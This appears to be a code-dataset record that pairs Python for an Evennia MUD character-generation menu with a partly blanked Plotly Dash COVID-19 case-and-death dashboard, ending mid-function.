% cost\n success(caller, msg)\n return 'node_attributes'\n\n\ndef node_finish(caller):\n text = ''\n options = ()\n return text, options\n\n\ndef success(caller, msg):\n caller.msg('|b<|cSystem|b>|n %s' % msg)\n\n\ndef error(caller, msg):\n caller.msg('|y<|rError|y>|n %s' % msg)\n", "step-5": "from world.enums import *\nfrom world.content.species import SPECIES\nfrom world.content.chargen import *\nfrom evennia.utils.evmenu import get_input\nfrom evennia.utils.utils import list_to_string\nimport re\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {\n \"attributes\": 20,\n \"skills\": 20\n }\n caller.ndb._menutree.character = {\n \"home_planet\": None,\n \"full_name\": None,\n \"origin\": None,\n \"stats\": {},\n \"age\": 16,\n \"is_psionic\": False,\n \"current_term\": 0,\n \"species\": \"human\"\n }\n caller.ndb._menutree.terms = []\n\n for attribute in AttributeEnum:\n caller.ndb._menutree.character[\"stats\"][attribute.name] = 20\n\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. 
type |ybegin|n to start CharGen.\n \"\"\"\n\n return text, ({\"key\": \"begin\", \"goto\": \"node_menu\"})\n\n\ndef node_menu(caller):\n name = caller.ndb._menutree.character[\"full_name\"]\n if not name:\n name = \"Not Set\"\n species = caller.ndb._menutree.character[\"species\"]\n origin = caller.ndb._menutree.character[\"origin\"]\n if not origin:\n origin = \"Not Set\"\n\n d_b = \"|gOk|n\" if _is_basics_done(caller)[0] else \"|rNo|n\"\n d_a = \"|gOk|n\" if _is_attributes_done(caller)[0] else \"|rNo|n\"\n d_s = \"|gOk|n\" if _is_skills_done(caller)[0] else \"|rNo|n\"\n d_l = \"|gOk|n\" if _is_life_done(caller)[0] else \"|rNo|n\"\n\n text = \"\"\"\n Below are the general details of your character. Use the below commands\n to navigate through chargen steps. Some steps may appear after others are completed.\n \n |wFull Name:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Completed:\n |wBasics:|n %s\n |wAttributes:|n %s\n |wStarting Skills:|n %s\n |wLife path:|n %s \n \"\"\" % (name, species, origin, d_b, d_a, d_s, d_l)\n\n options = (\n {\"key\": \"basics\", \"goto\": \"node_basics\"},\n {\"key\": \"attributes\", \"goto\": \"node_attributes\"},\n {\"key\": \"skills\", \"goto\": \"node_skills\"}\n )\n\n if _is_basics_done(caller)[0] and _is_attributes_done(caller)[0] and _is_skills_done(caller)[0]:\n options.append({\"key\": \"life path\", \"goto\": \"node_terms\"})\n if _is_life_done(caller)[0]:\n options.append({\"key\": \"finish\", \"goto\": \"node_finish\"})\n\n return text, options\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character[\"full_name\"]\n if not name:\n name = \"Not Set\"\n species = character[\"species\"]\n origin = character[\"origin\"]\n if not origin:\n origin = \"Not Set\"\n age = character[\"age\"]\n text = \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\" % (name, age, species, origin)\n\n options 
= (\n {\"key\": \"return\", \"goto\": \"node_menu\"},\n {\"key\": \"full_name\", \"goto\": _node_basics_full_name},\n {\"key\": \"age\", \"goto\": _node_basics_age},\n {\"key\": \"species\", \"goto\": _node_basics_species},\n {\"key\": \"origin\", \"goto\": _node_basics_origin}\n )\n\n return text, options\n\n\ndef _node_basics_full_name(caller):\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character[\"full_name\"] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN[\"species\"] if s[\"key\"] == caller.ndb._menutree.character[\"species\"])\n if not user_input.is_integer() \\\n or int(user_input) < species[\"min_start_age\"] \\\n or int(user_input) > species[\"max_start_age\"]:\n caller.msg(\"Age must be a valid number between %s and %s.\"\n % (species[\"min_start_age\"], species[\"max_start_age\"]))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character[\"age\"] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\ndef _node_basics_species(caller):\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n species = next((s for s in SPECIES if s[\"title\"].lower().startswith(user_input.lower())), None)\n if not species:\n caller.msg(\"'%s' is not a valid species. 
Valid species: |wHuman|n, and |wAndroid.|n\" % user_input)\n return\n species_chargen = next(s for s in CHARGEN[\"species\"] if s[\"key\"] == species[\"key\"])\n caller.msg(\"You set your character's species to: %s.\" % species[\"title\"])\n character[\"age\"] = species_chargen[\"min_age\"]\n character[\"origin\"] = None\n character[\"species\"] = species[\"key\"]\n get_input(caller, \">> Enter your character's species.\", callback)\n\n\ndef _node_basics_origin(caller):\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n origins = filter(lambda o: character[\"species\"] in o[\"species_restrictions\"], CHARGEN[\"origins\"])\n origin = next((o for o in origins if o[\"title\"].lower().startswith(user_input.lower())), None)\n if not origin:\n caller.msg(\"'%s' is not a valid origin choice. Valid choices: %s\"\n % (user_input, list_to_string(map(lambda o: o[\"title\"], origins))))\n return\n caller.msg(\"You set your character's origin to: %s.\" % user_input)\n character[\"origin\"] = origin[\"key\"]\n get_input(caller, \">> Enter your character's origin.\", callback)\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points[\"attributes\"] != 0:\n return False, \"All attribute points must be allocated.\"\n return True, \"\"\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character[\"full_name\"]\n if not name or len(name) < 3:\n return False, \"Full name must have a value and be longer than 3 characters.\"\n origin = character[\"origin\"]\n if not origin:\n return False, \"Must select an origin.\"\n species_stats = next(s for s in CHARGEN[\"species\"] if s[\"key\"] == character[\"species\"])\n age = character[\"age\"]\n if age < species_stats[\"min_start_age\"]:\n return False, \"Age must be equal to or more than %s.\" % species_stats[\"min_start_age\"]\n if age > species_stats[\"max_start_age\"]:\n return False, \"Age must be equal to or less than %s.\" % 
species_stats[\"max_start_age\"]\n return True, \"\"\n\n\ndef _is_skills_done(caller):\n return False, \"\"\n\n\ndef _is_life_done(caller):\n return False, \"\"\n\n\ndef node_skills(caller):\n text = \"\"\"\n \"\"\"\n\n index = 0\n stats = caller.ndb._menutree.character[\"stats\"]\n for skill in SkillEnum:\n if index % 2 == 0:\n text += \"\\n\"\n\n text += (\"%s:\" % skill.name).ljust(28)\n value = stats.get(skill.name, 0)\n text += str(value).rjust(9)\n if index % 2 == 0:\n text += \" \"\n index += 1\n\n options = (\n {\"key\": \"return\", \"goto\": \"node_menu\"},\n {\"key\": \"set\", \"goto\": \"\"}\n )\n\n return text, options\n\n\ndef node_attributes(caller):\n text = \"\"\n for attribute in AttributeEnum:\n if attribute == AttributeEnum.Psi and not caller.ndb._menutree.character[\"is_psionic\"]:\n continue\n text += \"%s: \" % attribute.name\n text += \"%s\\r\\n\" % caller.ndb._menutree.character[\"stats\"][attribute.name]\n text += \"\\r\\n%s points remaining.\\r\\n\" % caller.ndb._menutree.points[\"attributes\"]\n text += \"\\r\\nType \\\"|yadd <number> to <attribute>|n\\\" to adjust an attribute positively.\"\n text += \"\\r\\nType \\\"|ysub <number> from <attribute>|n\\\" to adjust an attribute negatively.\"\n\n # options = {\"key\": \"_default\", \"goto\": _node_attributes}\n # if caller.ndb._menutree.points[\"attributes\"] == 0:\n options = ({\"key\": \"_default\", \"goto\": _node_attributes},\n {\"key\": \"return\", \"goto\": \"node_menu\"})\n return text, options\n\n\ndef _node_attributes(caller, raw_string):\n match = re.match(r\"add (\\d+) to (\\w+)\", raw_string)\n if match:\n return adjust_attribute(caller, match, True)\n match = re.match(r\"sub (\\d+) from (\\w+)\", raw_string)\n if match:\n return adjust_attribute(caller, match, False)\n\n if not match:\n return \"node_attributes\"\n\n\ndef node_terms(caller):\n text = \"\"\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += \"\\r\\n* Term %s:\" % term_count + \" %s\" % 
term.title\n term_count += 1\n\n age = caller.ndb._menutree.character[\"age\"] + (4 * caller.ndb._menutree.character[\"current_term\"])\n text += \"\\r\\nCurrent Character Age: %s\" % age\n text += \"\\r\\n\\r\\nType \\\"|ychoose <term>|n\\\" to begin a term.\"\n\n options = ({\"key\": \"_default\", \"goto\": _node_terms},\n {\"key\": \"list choices\", \"goto\": _list_term_choices},\n {\"key\": \"finish\", \"goto\": \"node_finish\"})\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match(r\"choose (\\w+)\", raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return \"node_terms\"\n\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x[\"title\"].lower().startswith(term_token)), None)\n if not term:\n error(caller, \"%s is not a valid term. Type \\\"|ylist choices|n\\\" to get a list of all available careers.\")\n return \"node_terms\"\n\n caller.ndb._menutree.terms.append({\n \"term\": term[\"title\"]\n })\n return \"node_term\"\n\n\ndef _list_term_choices(caller):\n text = \"\"\n for term in TERMS:\n text += \"\\r\\n* %s\" % term[\"title\"]\n for assignment in term[\"assignments\"]:\n text += \"\\r\\n\\t- %s: \" % assignment[\"title\"]\n text += \"sample description text\"\n\n caller.msg(text)\n return \"node_terms\"\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1][\"term\"]\n # term = next((x for x in TERMS if x[\"title\"] == term_title), None)\n text = \"Career: %s\" % term_title\n text += \"\\r\\nAssignment: Not Set\"\n text += \"\\r\\nPersonal Advancement: Not Set\"\n text += \"\\r\\nYears: %s\" % caller.ndb._menutree.character[\"age\"]\n text += \"-%s\" % (caller.ndb._menutree.character[\"age\"] + 4)\n text += \"\\r\\n\\r\\nLife Event: |y1 Available|n\"\n\n text += \"\\r\\n\\r\\nType \\\"|yset Assignment to <assignment>|n\\\" to choose an assignment.\"\n text += \"\\r\\nType \\\"|yset Advancement to <option>|n\\\" to choose a 
personal advancement.\"\n text += \"\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. \"\n text += \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n\n options = ({\"key\": \"show assignments\", \"goto\": _list_term_assignments},\n {\"key\": \"show advancements\", \"goto\": _list_term_advancements},\n {\"key\": \"roll life event\", \"goto\": _do_life_event})\n return text, options\n\n\ndef _list_term_advancements(caller):\n return \"node_term\"\n\n\ndef _list_term_assignments(caller):\n return \"node_term\"\n\n\ndef _do_life_event(caller):\n return \"node_term\"\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith(attribute_token)), None)\n if not attribute:\n error(caller, \"%s is not a valid attribute.\" % match.group(2))\n return \"node_attributes\"\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, \"Value to adjust must be a positive number.\")\n return \"node_attributes\"\n\n attribute_value = caller.ndb._menutree.character[\"stats\"][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + \" cannot be reduced below 10.\")\n return \"node_attributes\"\n\n # calculate cost..\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n\n if not is_add:\n cost *= -1\n\n if cost > caller.ndb._menutree.points[\"attributes\"]:\n deficit = (caller.ndb._menutree.points[\"attributes\"] - cost) * -1\n error(caller, \"Raising %s\" % attribute.name + \" costs %s total points,\" % cost + \" %s more points than 
you have available.\" % deficit)\n return \"node_attributes\"\n\n # Succeeded the gauntlet. Change their stat.\n if is_add:\n caller.ndb._menutree.character[\"stats\"][attribute.name] += value\n else:\n caller.ndb._menutree.character[\"stats\"][attribute.name] -= value\n caller.ndb._menutree.points[\"attributes\"] -= cost\n\n msg = \"Successfully set %s \" % attribute.name + \"to %s\" % caller.ndb._menutree.character[\"stats\"][attribute.name]\n msg += \" for %s points.\" % cost\n success(caller, msg)\n return \"node_attributes\"\n\n\ndef node_finish(caller):\n text = \"\"\n options = ()\n\n return text, options\n\n\ndef success(caller, msg):\n caller.msg(\"|b<|cSystem|b>|n %s\" % msg)\n\n\ndef error(caller, msg):\n caller.msg(\"|y<|rError|y>|n %s\" % msg)\n", "step-ids": [ 14, 15, 19, 22, 27 ] }
[ 14, 15, 19, 22, 27 ]
<|reserved_special_token_0|> @app.callback(Output(component_id='global-box-1', component_property= 'figure'), [Input(component_id='global-dropdown', component_property= 'value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di ['Confirmed'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Cases Double Every 3 Days'], hovertemplate= '<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, 
dash='dot'), text=[ '# of Cases Double Every 7 Days'], hovertemplate= '<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10 (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[ 'Days Since 1000 Cases'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di ['Deaths'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region' ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 
Deaths'].max()))], name= 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Deaths Double Every 3 Days'], hovertemplate= '<b>Deaths Double Every 3 Days</b>', showlegend=True)) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Deaths Double Every 7 Days'], hovertemplate= '<b>Deaths Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Deaths', 'range': [np.log10(100), np.log10(cases_1000_start['Deaths']. max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno = [] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True ).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] m2 = m.loc[i, 'Mortality_Percent'] trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2], y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)], orientation='h', textposition='auto', marker=dict(color= '#FFB000', opacity=0.6, line=dict(color= 'rgba(255,176,0, 1)', width=1)), hovertemplate= '<b>%{y}</b><br>' + '<br>Observed Case Mortaility Pct: %{text}&#37;<br>', 
showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title': 'Country / Region', 'fixedrange': True, 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Observed Case - Mortality Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [ 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=750, hovermode='closest') fig_global = {'data': figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100) ].reset_index() for i in range(len(rc)): scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=colors_dict_global[rc.loc[ i, 'Continent']], showlegend=False, marker=dict(size=12, line_width=1, opacity=0.75), hovertemplate= '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' + 'Deaths: %{x}<br>', textposition='bottom center', textfont= dict(size=10, color='rgba(0, 0, 0, 0.6)')) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25, line=dict(color='grey', width=1), text=[ '# of Deaths = # of Recoveries'], hovertemplate= '<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths']. 
max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=0.25, line=dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate= '<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=0.25, line=dict(color='firebrick', width=3, dash='dash' ), text=['2 Deaths for Every Recovery'], hovertemplate= '<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Recoveries', 'fixedrange': True, 'automargin': True, 'range': [np.log10(100), np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title= 'Recoveries vs. Deaths, By Country', xaxis={'title': 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100), np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, height=750, hovermode='closest' ) fig_global = {'data': figscat, 'layout': layout_global} return fig_global @app.callback([Output(component_id='main-dropdown-2', component_property= 'options'), Output(component_id='btext1', component_property='children' ), Output(component_id='subplot1', component_property='figure'), Output (component_id='btext2', component_property='children'), Output( component_id='subplot2', component_property='figure'), Output( component_id='btext3', component_property='children'), Output( component_id='subplot3', component_property='figure')], [Input( component_id='main-dropdown', component_property='value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] 
vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', 
x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} else: options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == 
selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). 
mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} @app.callback(Output(component_id='box-1', component_property='figure'), [ Input(component_id='main-dropdown', component_property='value'), Input( component_id='main-dropdown-2', component_property='value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'], y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [ 0, final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Overall Progression of COVID-19: {0}'.format(str( selected_country)), hovermode='x unified', xaxis=dict(title= 'Date', fixedrange=True, 